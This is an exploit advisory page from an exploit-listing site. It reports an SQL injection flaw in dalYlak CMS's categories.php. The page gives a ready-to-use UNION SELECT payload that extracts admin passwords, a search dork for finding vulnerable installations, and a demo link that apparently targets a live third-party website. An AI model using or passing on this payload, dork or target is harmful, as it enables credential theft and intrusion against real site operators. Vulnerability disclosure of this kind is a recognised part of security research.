dalYlak Cms SQLInjection Vulnerability

2011-04-26 / 2011-04-27
Credit: Net.Edit0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#(+) Exploit Title: dalYlak Cms SQLInjection Vulnerability #(+) Author : Net.Edit0r #(+) Data : 2011-04-26 #(+) E-mail : Black.Hat.tm@gmail.com #(+) Home : http://security-war.com and Black-hg.com #(+) dork : "Powred by dalYlak.com" #(+) Versian : All Ver #(+) Category : Web Apps [SQl] #(+) Platform : Tested on: linux #(+) Download : http://www.dalYlak.com/ ____________________________________________________________________ Black Hat Group #BHG ____________________________________________________________________ The security problem in the file "categories.php" has been created. [~] Vulnerable File : # [+]http://localhost/categories.php?act=show&id=[SQL] [~] SQL injection Vulnerability # [+]-1+/**/+UNION+/**/+SELECT+/**/+passwd+/**/+FrOm+/**/+admin-- [+]http://www.localhost/categories.php?act=show&id=-1+/**/+UNION+/**/+SELECT+/**/+passwd+/**/+FrOm+/**/+admin-- [~] Demo : [+] http://www.arabiskco.com/pro/categories.php?act=show&id=-1+/**/+UNION+/**/+SELECT+/**/+passwd+/**/+FrOm+/**/+admin-- ########################## (+)IRANIAN Young HackerZ # Persian Gulf 4 Ever ########################## (+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x & 3H34N & Mr.Xhat & Amir-MagiC & D3adly #BHG ########################## (+)Gr33ts to : Ajaxtm.com ~ Mn-team.net All Iranian HackerZ ##########################

References:

http://www.dalYlak.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top